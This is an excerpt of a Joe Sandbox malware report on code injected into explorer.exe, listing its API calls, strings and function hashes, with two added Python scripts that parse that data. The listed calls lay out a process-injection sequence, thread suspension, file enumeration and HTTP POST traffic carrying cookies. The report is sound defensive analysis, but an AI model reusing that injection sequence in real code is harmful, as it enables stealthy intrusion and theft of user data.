                                                                                                                                                      • Accept: */*Referer: %S, xrefs: 001619E8
                                                                                                                                                      • POST, xrefs: 001619A0
                                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 00161A34
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                                      • Opcode ID: 1a538062c80ffd7d964881cab05e8fe24229b886925e1a9ebbf903540339cb37
                                                                                                                                                      • Instruction ID: 9ce79382091bb0f57ee96942796e91fcb2ec6db7c06246edf714429ea8fd950d
                                                                                                                                                      • Opcode Fuzzy Hash: 1a538062c80ffd7d964881cab05e8fe24229b886925e1a9ebbf903540339cb37
                                                                                                                                                      • Instruction Fuzzy Hash: 12815875608340AFD7149FA8DC84A2BBBE9EF99344F08092DF545D3251DB70DD94CB92
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0016104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00162A16,?,00000001), ref: 00161056
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 001625BB
                                                                                                                                                      • lstrcat.KERNEL32(?,001642A8), ref: 001625C7
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 001625D6
                                                                                                                                                      • lstrcat.KERNEL32(?,001642AC), ref: 001625E5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$AllocVirtual
                                                                                                                                                      • String ID: :authority$?$dyn_header
                                                                                                                                                      • API String ID: 3028025275-1785586894
                                                                                                                                                      • Opcode ID: ffa44e6375e1baba235d8b2ea65e05314f9111ba71e63eeb649903b6d3d6c69a
                                                                                                                                                      • Instruction ID: 0ce998fa913733a178ba604a9b95661f3344c0a8be0dd8efd73222af5c736960
                                                                                                                                                      • Opcode Fuzzy Hash: ffa44e6375e1baba235d8b2ea65e05314f9111ba71e63eeb649903b6d3d6c69a
                                                                                                                                                      • Instruction Fuzzy Hash: 89613972508B128FC714EF24DD906AAB7E6ABA8311F44092DFCC157282DB389D1DDB63
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0016291B
                                                                                                                                                      • lstrcat.KERNEL32(?,001642BC), ref: 0016292A
                                                                                                                                                      • lstrlen.KERNEL32(?,771A8A60,00000001,?,?,00000000,?,?,00162B26,?,?,?,?,00000001), ref: 0016295C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                                                      • String ID: cookie
                                                                                                                                                      • API String ID: 2957667536-1295510418
                                                                                                                                                      • Opcode ID: 1e65c149d7077f48a631f72700dac0c1d7c34768ba80a769528126fbd01e34db
                                                                                                                                                      • Instruction ID: 745cd7c0dfb543ad7dabe3d44e6e0f33a9153d531b4f851f10d2da4fd05d2065
                                                                                                                                                      • Opcode Fuzzy Hash: 1e65c149d7077f48a631f72700dac0c1d7c34768ba80a769528126fbd01e34db
                                                                                                                                                      • Instruction Fuzzy Hash: 0D110A323047225BD7109A98DC95BAB76E8DBD0708F14052DF901A7281E7B1E8298390
                                                                                                                                                      APIs
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00161E83
                                                                                                                                                      • LoadLibraryA.KERNEL32(?,00166058,00000000,00000000,771B2EE0,00000000,001620DC,?), ref: 00161EAB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00161ED8
                                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00161F29
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                                      • Opcode ID: f1bf1b6419b8737fa1bfd164540b306d9ebd12ff430b725e17993a2e567bb455
                                                                                                                                                      • Instruction ID: 1edaea909f03bc6a13c539487536eaabe3d6d4dc2cbad4e9c989517273cda6fa
                                                                                                                                                      • Opcode Fuzzy Hash: f1bf1b6419b8737fa1bfd164540b306d9ebd12ff430b725e17993a2e567bb455
                                                                                                                                                      • Instruction Fuzzy Hash: 46318E72701216BFCB28CF29CC84BA6B7E8FF15354B1945ACE856C7601D772E865CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000), ref: 001612BC
                                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 001612CE
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 001612E1
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001612F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                                      • Opcode ID: 9e47a38d83782686d0508d3f8332c4d18d453621549a1c235e491becbc4648d0
                                                                                                                                                      • Instruction ID: 16b9d4f96d99e659710b79b1ae723e90a568a43be9847729d742ebf1d43b78ff
                                                                                                                                                      • Opcode Fuzzy Hash: 9e47a38d83782686d0508d3f8332c4d18d453621549a1c235e491becbc4648d0
                                                                                                                                                      • Instruction Fuzzy Hash: 0AF09071846228FF9B10CFA4AD848FEB76CEB02251F24426AF901D2140D7714E4196A1
                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(00166038), ref: 00163332
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(00166038), ref: 00163358
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                      • String ID: POST
                                                                                                                                                      • API String ID: 3168844106-1814004025
                                                                                                                                                      • Opcode ID: 8f7a920ad361cf1d2ce6115e5003ef7b02eafc7d206201891ce073b39ee6211f
                                                                                                                                                      • Instruction ID: b5b258318808957badac2cbcf4b6debc56b18feb0aab73621a321d230df57b20
                                                                                                                                                      • Opcode Fuzzy Hash: 8f7a920ad361cf1d2ce6115e5003ef7b02eafc7d206201891ce073b39ee6211f
                                                                                                                                                      • Instruction Fuzzy Hash: 7F01AF31500114FBCB252F60EC4C89F7FA9FF857B67184020F91A96262DF31DDA1DAA1
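Each record's API ID (for instance Find$File$CloseFirstNext or Process32$CloseCreateFirstHandleNextSnapshotToolhelp32) is the key the Similarity section uses to match a function against functions in other dumps. The Python below is an added reconstruction, not Joe Sandbox's code and not anything from this report: it infers the rule from the six records in this section (split each API name on CamelCase, drop tokens shorter than four characters, which removes the Rtl/Nt prefixes, the A/W suffixes and short words such as Map, Of and Ex, count the remaining tokens over the function's own calls only, and emit the tokens grouped by descending count, alphabetical within a group, with $ between groups). The four-character threshold and the grouping rule are assumptions that happen to reproduce every key on this page; the numeric API String ID is not reproduced.

```python
import re
from collections import Counter

# Constructed from the function records in this section: each function's own
# API calls (the "Part of subcall function" lines are excluded), one entry per
# call site, so the two VirtualProtect sites in 009ED748 count twice. The
# record for the RtlEnterCriticalSection function gives only the ref address,
# so that entry is keyed by its first ref.
FUNCTION_APIS = {
    "ref 00163332": ["RtlEnterCriticalSection", "RtlLeaveCriticalSection"],
    "009E1DB0": ["FindFirstFileW", "FindNextFileW", "FindClose"],
    "009E1EB4": ["FindFirstFileW", "FindNextFileW", "FindClose"],
    "009E5300": ["NtUnmapViewOfSection"],
    "009E1D08": ["CreateToolhelp32Snapshot", "Process32First",
                 "Process32Next", "CloseHandle"],
    "009ED748": ["LoadLibraryA", "VirtualProtect", "VirtualProtect"],
    "009E1B74": ["OpenFileMappingA", "MapViewOfFile"],
}

# Assumption: tokens shorter than this are ignored. Four is the smallest value
# that drops Rtl, Nt, Map, Of, Ex and the A/W suffix while keeping Load, View
# and Open, which all appear in the keys on this page.
MIN_TOKEN_LEN = 4

CAMEL_TOKEN = re.compile(r"[A-Z][a-z0-9]*")


def split_api_name(name):
    """Split an API name on CamelCase boundaries; digits stay attached to the
    preceding word (Process32, Toolhelp32)."""
    return CAMEL_TOKEN.findall(name)


def api_id(api_calls):
    """Reconstructed key: count significant tokens over all listed calls,
    group tokens by descending count, sort each group alphabetically and
    join the groups with '$'."""
    counts = Counter(
        tok
        for name in api_calls
        for tok in split_api_name(name)
        if len(tok) >= MIN_TOKEN_LEN
    )
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def group_by_api_id(functions):
    """Cluster functions that share a key, the way the Similarity section
    links 009E1DB0 and 009E1EB4 under one API String ID."""
    groups = {}
    for addr, calls in functions.items():
        groups.setdefault(api_id(calls), []).append(addr)
    return groups


if __name__ == "__main__":
    for key, addrs in group_by_api_id(FUNCTION_APIS).items():
        print(key, "->", ", ".join(addrs))
```

Because the key ignores call order, argument values and the surrounding code, two unrelated functions that happen to make the same calls collide on it; treat a matching API ID as a reason to diff the two functions, not as proof that they are the same code.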

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.9%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:42%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:50
                                                                                                                                                      Total number of Limit Nodes:5
[Execution graph rendering omitted. Four entry points are exercised at runtime: 9ed5da and 9ed748 both reach LoadLibraryA (9ed835) and two VirtualProtect calls (9ed884); 9ed637 reaches 9ed748 only as a truncated "3 API calls" node; 9e4914 calls 9e1d08 three times (CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle), then SleepEx, then the mutually recursive directory walkers 9e1eb4 and 9e1db0 (FindFirstFileW, FindNextFileW, FindClose).]
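The execution graph is serialised as a flat token stream, which makes the runtime behaviour hard to read off. The Python below is an added example, not code from Joe Sandbox or from this report: it parses the token stream of the execution graph this report renders for the explorer.exe dumps into nodes and edges, finds the entry points (nodes with no incoming edge) and walks each one to recover the order of API calls it reaches. The grammar it assumes ("<id> <six-hex-digit address>" opens a node, followed by API names or the truncation marker "N API calls"; "<id>-><id>" is an edge) is inferred from this page, not from a published format description.

```python
import re
from collections import OrderedDict

# Token stream copied from the execution_graph this report renders for the
# explorer.exe dumps (00000013.*, regions 009E1000 and 009EC000).
EXECUTION_GRAPH = """execution_graph
1528 9ed5da 1529 9ed614 1528->1529 1530 9ed91d 1529->1530 1533 9ed748 1529->1533
1534 9ed74d 1533->1534 1535 9ed835 LoadLibraryA 1534->1535
1537 9ed884 VirtualProtect VirtualProtect 1534->1537 1539 9ed6f8 1534->1539
1535->1534 1538 9ed912 1537->1538 1487 9ed748 1488 9ed74d 1487->1488
1489 9ed835 LoadLibraryA 1488->1489 1491 9ed884 VirtualProtect VirtualProtect 1488->1491
1493 9ed879 1488->1493 1489->1488 1492 9ed912 1491->1492 1540 9ed637 1541 9ed62e
1540->1541 1542 9ed91d 1541->1542 1543 9ed748 3 API calls 1541->1543 1544 9ed6f8
1543->1544 1494 9e4914 1506 9e1d08 CreateToolhelp32Snapshot 1494->1506
1497 9e1d08 4 API calls 1498 9e4941 1497->1498 1499 9e1d08 4 API calls 1498->1499
1500 9e494d SleepEx 1499->1500 1501 9e4962 1500->1501 1503 9e49e0 1501->1503
1512 9e1eb4 1501->1512 1502 9e4a18 1503->1502 1504 9e1eb4 6 API calls 1503->1504
1504->1502 1507 9e1d2c Process32First 1506->1507 1508 9e1d7a 1506->1508
1510 9e1d44 1507->1510 1508->1497 1509 9e1d71 CloseHandle 1509->1508 1510->1509
1511 9e1d5f Process32Next 1510->1511 1511->1510 1520 9e1db0 1512->1520
1514 9e1ed6 1515 9e1efd FindFirstFileW 1514->1515 1516 9e1f8f 1515->1516
1519 9e1f14 1515->1519 1516->1501 1517 9e1f74 FindNextFileW 1518 9e1f86 FindClose
1517->1518 1517->1519 1518->1516 1519->1517 1521 9e1dde 1520->1521
1522 9e1dfb FindFirstFileW 1521->1522 1523 9e1e8e 1522->1523 1526 9e1e12 1522->1526
1523->1514 1524 9e1e73 FindNextFileW 1525 9e1e85 FindClose 1524->1525 1524->1526
1525->1523 1526->1524 1527 9e1eb4 3 API calls 1526->1527 1527->1526
"""

# Assumed grammar (inferred from this page, not a documented format).
NODE_ADDR = re.compile(r"^[0-9a-f]{6}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
LIMIT = re.compile(r"^(\d+) API calls$")


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> {addr, apis, limit} in
    definition order; edges is the list of (src, dst) in stream order."""
    tokens = text.split()
    nodes, edges, notes = OrderedDict(), [], {}
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None               # an edge closes the open node
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and NODE_ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "limit": None}
            notes[current] = []
            i += 2
        else:
            if current is not None:      # annotation of the open node
                notes[current].append(tok)
            i += 1
    for nid, words in notes.items():
        m = LIMIT.match(" ".join(words))
        if m:
            nodes[nid]["limit"] = int(m.group(1))   # sandbox truncated here
        else:
            nodes[nid]["apis"] = words
    return nodes, edges


def roots(nodes, edges):
    """Nodes with no incoming edge: the entry points the sandbox observed."""
    targets = {dst for _, dst in edges}
    return [nid for nid in nodes if nid not in targets]


def api_trace(nodes, edges, root):
    """Depth-first walk from root in edge order, visiting each node once;
    returns the API names met on the way, with truncated nodes reported as
    '<N API calls in addr>'."""
    out = {}
    for src, dst in edges:
        out.setdefault(src, []).append(dst)
    trace, seen, stack = [], set(), [root]
    while stack:
        nid = stack.pop()
        if nid in seen:
            continue
        seen.add(nid)
        node = nodes[nid]
        if node["limit"] is not None:
            trace.append("<%d API calls in %s>" % (node["limit"], node["addr"]))
        trace.extend(node["apis"])
        stack.extend(reversed(out.get(nid, [])))   # keep edge order
    return trace


def summarize(text):
    """Map each entry point's address to its recovered API sequence."""
    nodes, edges = parse_execution_graph(text)
    return {nodes[r]["addr"]: api_trace(nodes, edges, r) for r in roots(nodes, edges)}


if __name__ == "__main__":
    for addr, trace in summarize(EXECUTION_GRAPH).items():
        print(addr, "->", ", ".join(trace) or "(no API calls reached)")
```

Running it prints one line per entry point; for 9e4914 the sequence is process enumeration (CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle), a SleepEx, then the FindFirstFileW/FindNextFileW/FindClose pairs of the two recursive directory walkers. Nodes the sandbox truncated (the five "N API calls" limit nodes) are kept in the trace so that a reader sees where coverage stops rather than silently losing those calls.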

                                                                                                                                                      Callgraph

[Callgraph rendering omitted. It covers 117 recovered functions, Function_009E1000 through Function_009ED748, with their static call edges; the four functions entered at runtime according to the execution graph are Function_009ED5DA, Function_009ED748, Function_009ED637 and Function_009E4914.]

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE ref: 009E1E03
                                                                                                                                                      • FindNextFileW.KERNELBASE ref: 009E1E7B
                                                                                                                                                      • FindClose.KERNELBASE ref: 009E1E88
                                                                                                                                                        • Part of subcall function 009E1EB4: FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                        • Part of subcall function 009E1EB4: FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                        • Part of subcall function 009E1EB4: FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                      • Instruction ID: f26ab08571aa78db495bcd119fda67d5812ac12626327416982b44708a9a98a2
                                                                                                                                                      • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                                                      • Instruction Fuzzy Hash: 69218F3021CE484BDB59EB2DA89936D77D1EBD8350F40066DF98EC3296DE389D058785

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009E1DB0: FindFirstFileW.KERNELBASE ref: 009E1E03
                                                                                                                                                        • Part of subcall function 009E1DB0: FindNextFileW.KERNELBASE ref: 009E1E7B
                                                                                                                                                        • Part of subcall function 009E1DB0: FindClose.KERNELBASE ref: 009E1E88
                                                                                                                                                      • FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                      • FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                      • FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                      • Instruction ID: e343e84cc597d1d38789d4f34e25b0c21cbe56df5b715513f0e4f603ab935252
                                                                                                                                                      • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                                                      • Instruction Fuzzy Hash: 3D21217020CA484FDF45FF29989976D77E1EBE8344F000A6DA55AC3292DF38D9448785

                                                                                                                                                      Control-flow Graph

[Control-flow graph rendering omitted. Function 009E5300 (blocks 9e5300-9e53be) calls 009E1BE8 and 009E1838, reaches NtUnmapViewOfSection at 9e5371-9e538a, then calls 009E4C80, 009E5104 and, at 9e53ad, itself.]
                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009E5378
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                      • Instruction ID: f1a8d33700c31467a28933c0e72e64857587143cc0ab9709ade113b45b729f5a
                                                                                                                                                      • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                                                      • Instruction Fuzzy Hash: C611C630605D898FEB5EF7BA54993793399EB54305F64053AE415C72A6DA39CE808301

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                      • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                      • Instruction ID: f8c2e1b2851a1b5218f726e017160d59061733b9ac1cb237a61d3dd8869ca1a8
                                                                                                                                                      • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                                                      • Instruction Fuzzy Hash: DA014F30208A488FD756EB29DC887AE76E2FBD8315F104A2DA15AC6194DB38D9858B45

                                                                                                                                                      Control-flow Graph

[Control-flow graph rendering omitted. Function 009ED748 (blocks 9ed748-9ed928) loops over 9ed74d-9ed7cc calling 009ED70A, calls LoadLibraryA inside a loop at 9ed835-9ed856, then calls VirtualProtect twice in 9ed8be-9ed90e.]
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 009ED847
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009ED8E5
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009ED903
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 009EC000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9ec000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                      • Instruction ID: 918dc47188e7a3b0eacc97db5b123e1354604a9cccb34aae78f8c69a84e37ee7
                                                                                                                                                      • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                                                      • Instruction Fuzzy Hash: AE51CB3235999E4BCB26AB3D9CC03F5B7C5F759321B180A3AC48AC3285EA59CC4683C1

                                                                                                                                                      Control-flow Graph

[Control-flow graph rendering omitted. Function 009E1B74 (blocks 9e1b74-9e1bc4) calls OpenFileMappingA and, on one of its two branches, MapViewOfFile at 9e1b96-9e1bb4.]
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                      • Instruction ID: 9bb27058a441f730cb39bf213baf2be580a35fdc31787113ddf811c61f090aeb
                                                                                                                                                      • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                                                      • Instruction Fuzzy Hash: B6F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B048A7EA84AC7164EF34C8808701

Control-flow Graph

• Rendered graph not preserved in this extraction. Basic blocks 9e4914-9e4a2f: the entry block calls 9e1d08 three times (the Toolhelp32 process walk listed below), then SleepEx and 9e1838; the branch at 9e497b-9e49de calls 9e1838, 9e1eb4 (the FindFirstFileW/FindNextFileW directory walk) and 9e1860; the branch at 9e49e0-9e4a13 calls 9e1eb4 again before both paths reach 9e4a18-9e4a2f.
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 009E1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 009E1D1D
                                                                                                                                                        • Part of subcall function 009E1D08: Process32First.KERNEL32 ref: 009E1D3C
                                                                                                                                                        • Part of subcall function 009E1D08: CloseHandle.KERNELBASE ref: 009E1D74
                                                                                                                                                        • Part of subcall function 009E1D08: Process32Next.KERNEL32 ref: 009E1D67
                                                                                                                                                      • SleepEx.KERNELBASE ref: 009E4952
                                                                                                                                                        • Part of subcall function 009E1EB4: FindFirstFileW.KERNELBASE ref: 009E1F05
                                                                                                                                                        • Part of subcall function 009E1EB4: FindNextFileW.KERNELBASE ref: 009E1F7C
                                                                                                                                                        • Part of subcall function 009E1EB4: FindClose.KERNELBASE ref: 009E1F89
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.1940866851.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_9e1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1868932505-0
                                                                                                                                                      • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                      • Instruction ID: ab1c34eb40973740779adc164f053eb8b185fe63e530dc4ec4c12a2e15d3af1a
                                                                                                                                                      • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                                                      • Instruction Fuzzy Hash: 79318831618A488FDB5AEF69E8956EE73D2FBD8301B10462EE447C3161DE749D4187C0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:10.3%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:306
                                                                                                                                                      Total number of Limit Nodes:42
• Rendered execution graph not preserved in this extraction. API chains recoverable from the graph nodes (addresses in the 00861000 dump of process 20):
  - 861016 / 8610a4: VirtualQuery, heap allocation (862861: GetProcessHeap, RtlAllocateHeap), RtlMoveMemory, GetCurrentProcessId, then a CreateToolhelp32Snapshot / Process32First / lstrcmpiA chain / Process32Next / CloseHandle / Sleep loop; a matching entry goes to 8625ad (OpenProcess, IsWow64Process twice, CloseHandle) and 861819.
  - 861819 (the injection into the matched process): VirtualQuery, OpenProcess, NtSetInformationProcess, 861a80 (NtCreateSection, NtMapViewOfSection), 861b17 (RtlMoveMemory, LoadLibraryA, GetProcAddress, LdrProcessRelocationBlock), NtUnmapViewOfSection, a CreateMutexA / GetLastError / CloseHandle / Sleep retry loop, GetModuleHandleA, GetProcAddress, ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CloseHandle.
  - 861332 (thread routine): GetModuleFileNameA, GetCurrentProcessId, wsprintfA, 86263e (CryptAcquireContextA, CryptCreateHash, lstrlen, CryptHashData, CryptGetHashParam, wsprintfA, CryptDestroyHash, CryptReleaseContext), CreateMutexA, GetLastError, Sleep, 8624d5 (GetCurrentProcessId, GetCurrentThreadId, CreateToolhelp32Snapshot, Thread32First, OpenThread, SuspendThread or ResumeThread, CloseHandle, Thread32Next, CloseHandle), GetModuleHandleA, GetProcAddress (twice), 861de3 (VirtualProtect, VirtualAlloc, RtlMoveMemory, VirtualProtect), 862843 (VirtualQuery, GetProcessHeap, HeapFree), RtlExitUserThread; 861425 continues with VirtualQuery and 861493.
